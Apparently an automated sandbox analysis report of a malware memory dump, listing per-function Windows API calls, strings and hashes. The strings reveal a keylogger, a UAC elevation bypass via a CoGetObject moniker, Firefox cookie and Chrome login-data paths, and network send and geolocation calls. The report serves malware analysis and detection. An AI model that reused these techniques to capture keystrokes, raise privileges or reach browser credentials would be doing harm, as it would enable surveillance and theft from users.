                    • Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                    • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                    APIs
                    • _wcslen.LIBCMT ref: 00407521
                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Object_wcslen
                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • API String ID: 240030777-3166923314
                    • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                    • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                    • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                    • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                    APIs
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                    • GetLastError.KERNEL32 ref: 0041A7BB
                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                    • String ID:
                    • API String ID: 3587775597-0
                    • Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                    • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                    • Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                    • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                    • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                    • String ID: lJD$lJD$lJD
                    • API String ID: 745075371-479184356
                    • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                    • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                    • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                    • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    • API String ID: 1164774033-405221262
                    • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                    • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                    • Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                    • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                    • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                    • String ID:
                    • API String ID: 2341273852-0
                    • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                    • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                    • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                    • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Find$CreateFirstNext
                    • String ID: 8SG$PXG$PXG$NG$PG
                    • API String ID: 341183262-3812160132
                    • Opcode ID: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
                    • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                    • Opcode Fuzzy Hash: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
                    • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                    APIs
                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                    • GetLastError.KERNEL32 ref: 0040A2ED
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                    • TranslateMessage.USER32(?), ref: 0040A34A
                    • DispatchMessageA.USER32(?), ref: 0040A355
                    Strings
                    • Keylogger initialization failure: error , xrefs: 0040A301
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                    • String ID: Keylogger initialization failure: error
                    • API String ID: 3219506041-952744263
                    • Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                    • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                    • Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                    • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                    APIs
                    • GetForegroundWindow.USER32 ref: 0040A416
                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                    • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                    • GetKeyState.USER32(00000010), ref: 0040A433
                    • GetKeyboardState.USER32(?), ref: 0040A43E
                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                    • String ID:
                    • API String ID: 1888522110-0
                    • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                    • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                    • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                    • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                    APIs
                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                    • GetProcAddress.KERNEL32(00000000), ref: 00414271
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCloseCreateLibraryLoadProcsend
                    • String ID: SHDeleteKeyW$Shlwapi.dll
                    • API String ID: 2127411465-314212984
                    • Opcode ID: 503daa7f3cf37e559493f2b38fbdbd662be014167a3854e37f89a3b2555f4814
                    • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                    • Opcode Fuzzy Hash: 503daa7f3cf37e559493f2b38fbdbd662be014167a3854e37f89a3b2555f4814
                    • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                    APIs
                    • _free.LIBCMT ref: 00449212
                    • _free.LIBCMT ref: 00449236
                    • _free.LIBCMT ref: 004493BD
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                    • _free.LIBCMT ref: 00449589
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                    • String ID:
                    • API String ID: 314583886-0
                    • Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                    • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                    • Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                    • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                    APIs
                      • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                      • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                      • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                      • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                      • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                    • GetProcAddress.KERNEL32(00000000), ref: 00416872
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                    • String ID: !D@$PowrProf.dll$SetSuspendState
                    • API String ID: 1589313981-2876530381
                    • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                    • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                    • Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                    • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                    • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                    • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP$['E
                    • API String ID: 2299586839-2532616801
                    • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                    • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                    • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                    • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                    APIs
                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                    • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                    • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                    Strings
                    • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileRead
                    • String ID: http://geoplugin.net/json.gp
                    • API String ID: 3121278467-91888290
                    • Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                    • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                    • Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                    • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                    • GetLastError.KERNEL32 ref: 0040BA58
                    Strings
                    • [Chrome StoredLogins not found], xrefs: 0040BA72
                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                    • UserProfile, xrefs: 0040BA1E
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • API String ID: 2018770650-1062637481
                    • Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                    • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                    • Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                    • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                    APIs
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                    • GetLastError.KERNEL32 ref: 0041799D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                    • String ID: SeShutdownPrivilege
                    • API String ID: 3534403312-3733053543
                    • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                    • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                    • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                    • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                    APIs
                    • __EH_prolog.LIBCMT ref: 00409258
                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                    • FindClose.KERNEL32(00000000), ref: 004093C1
                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                      • Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                    • FindClose.KERNEL32(00000000), ref: 004095B9
                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                    • String ID:
                    • API String ID: 2435342581-0
                    • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                    • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                    • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                    • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ManagerStart
                    • String ID:
                    • API String ID: 276877138-0
                    • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                    • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                    • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                    • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                    • _wcschr.LIBVCRUNTIME ref: 00451E4A
                    • _wcschr.LIBVCRUNTIME ref: 00451E58
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                    • String ID: sJD
                    • API String ID: 4212172061-3536923933
                    • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                    • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                    • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                    • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                    APIs
                      • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                      • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                      • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                    • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                    • ExitProcess.KERNEL32 ref: 0040F8CA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseExitOpenProcessQuerySleepValue
                    • String ID: 5.0.0 Pro$override$pth_unenc
                    • API String ID: 2281282204-3992771774
                    • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                    • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                    • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                    • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                    APIs
                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                    • wsprintfW.USER32 ref: 0040B1F3
                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: EventLocalTimewsprintf
                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                    • API String ID: 1497725170-248792730
                    • Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                    • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                    • Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                    • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                    APIs
                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                    Strings
                    Memory Dump Source
